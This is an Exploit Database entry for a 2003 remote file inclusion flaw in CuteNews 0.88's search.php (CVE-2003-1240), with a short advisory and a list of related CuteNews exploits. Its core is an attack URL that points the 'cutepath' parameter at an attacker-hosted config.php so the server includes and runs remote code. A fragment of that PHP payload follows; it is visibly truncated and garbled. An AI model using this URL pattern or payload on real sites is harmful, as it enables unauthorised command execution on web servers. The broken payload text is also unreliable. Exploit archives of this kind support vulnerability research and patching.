Exploit Database - Logo

CuteNews 0.88 - 'search.php' Remote File Inclusion

EDB-ID: 22284 Author: Over_G Published: 2003-02-25
CVE: CVE-2003-1240 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/6935/info
 
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
 
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
 
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server. 

http://www.example.com/cutenews/search.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------
 
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2003-1240
Trying to match OSVDBs (1): 6051
Other Possible E-DB Search Terms: CuteNews 0.88,  CuteNews
Date D V Title Author
2010-10-05 Verified CuteNews - 'page' Local File Inclusioneidelweiss
2006-01-01 Verified CuteNews 1.4.1 - 'categories.mdu' Remote Command Executioncijfer
2006-03-26 Verified CuteNews 1.4.1 - 'function.php' Local File InclusionHamid Ebadi
2006-04-26 Verified CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilitiesoutlaw.dll
2003-02-25 Verified CuteNews 0.88 - 'comments.php' Remote File InclusionOver_G
2003-02-25 Verified CuteNews 0.88 - 'shownews.php' Remote File InclusionOver_G
2004-06-28 Verified CuteNews 0.88/1.3 - 'example1.php' Cross-Site ScriptingDarkBicho
2004-06-28 Verified CuteNews 0.88/1.3 - 'example2.php' Cross-Site ScriptingDarkBicho
2004-06-28 Verified CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site ScriptingDarkBicho
2004-09-02 Verified CuteNews 0.88/1.3.x - 'index.php' Cross-Site ScriptingExoduks
2008-01-06 Verified CuteNews 1.1.1 - 'html.php' Remote Code ExecutionEugene Minaev
2004-07-19 Verified CuteNews 1.3 - Comment HTML InjectionDarkBicho
2004-07-16 Verified CuteNews 1.3.1 - 'show_archives.php' Cross-Site ScriptingDebasis Moh...
2006-12-02 Verified CuteNews 1.3.6 - 'result' Cross-Site ScriptingDetefix
2005-09-17 Verified CuteNews 1.4.0 - Shell Injection / Remote Command Executionrgod
2006-05-05 Verified CuteNews 1.4.1 - 'search.php' Multiple Cross-Site Scripting VulnerabilitiesNST
2005-11-02 Verified CuteNews 1.4.1 - 'show_archives.php' Traversal Arbitrary File Accessretrogod@al...
2006-02-20 Verified CuteNews 1.4.1 - 'show_news.php' Cross-Site Scriptingimei
2005-11-02 Verified CuteNews 1.4.1 - 'template' Traversal Arbitrary File Accessretrogod@al...
2005-11-03 Verified CuteNews 1.4.1 - Shell Injection / Remote Command Executionrgod
2009-11-10 Verified CuteNews 1.4.6 - 'from_date_day' Full Path DisclosureAndrew Horton
2009-11-10 Verified CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)Andrew Horton
2009-11-10 Verified CuteNews 1.4.6 - 'index.php' Multiple Cross-Site Scripting VulnerabilitiesAndrew Horton
2009-11-10 Verified CuteNews 1.4.6 - 'result' Cross-Site ScriptingAndrew Horton
2009-11-10 Verified CuteNews 1.4.6 - 'search.php' Multiple Cross-Site Scripting VulnerabilitiesAndrew Horton
Menu